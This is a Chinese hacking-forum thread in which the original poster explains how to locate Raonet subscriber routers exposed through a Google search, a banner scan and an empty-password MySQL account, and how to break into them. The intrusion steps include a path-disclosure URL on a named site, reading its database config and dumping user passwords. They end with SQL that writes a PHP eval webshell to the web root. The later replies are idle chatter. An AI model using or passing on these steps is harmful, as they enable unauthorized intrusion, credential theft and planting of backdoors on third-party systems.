查看: 3478|回复: 26

利用某路由器漏洞入侵国外站点

[复制链接]
发表于 2012-12-9 05:22:00 | 显示全部楼层 |阅读模式
寻找存在漏洞的路由器方法:

1:google搜索'Raonet Subscriber Ethernet Router'

2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001

3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。

//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......


入侵步骤:

1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php

2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
3:得到密码后连接,查看GUI管理密码:
use ser_500
select id,passwd from user;
4:通过数据库写入webshell,执行命令:
use mysql;
create table ok(cmd TEXT);
insert into ok values("<?php @eval($_POST[cmd])?>");
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
drop table ok;

5:连接后门shell.php

6. 搞定!

漏洞证明:

发表于 2014-10-18 06:11:39 | 显示全部楼层
慢慢来,呵呵  
发表于 2014-10-20 07:47:26 | 显示全部楼层
我帮你 喝喝  
发表于 2014-10-27 02:56:10 | 显示全部楼层
世界上那些最容易的事情中,拖延时间最不费力。  
发表于 2014-11-6 13:59:48 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2014-11-18 23:17:09 | 显示全部楼层
这贴子你会收藏吗  
发表于 2014-12-6 17:58:39 | 显示全部楼层
每天早上起床都要看一遍“福布斯”富翁排行榜,如果上面没有我的名字,我就去上班……  
发表于 2014-12-29 22:38:28 | 显示全部楼层
围观来了哦  
发表于 2015-1-29 22:38:51 | 显示全部楼层
拿分走人呵呵,楼下继续!
发表于 2015-3-4 02:12:24 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
高级模式
B Color Image Link Quote Code Smilies

本版积分规则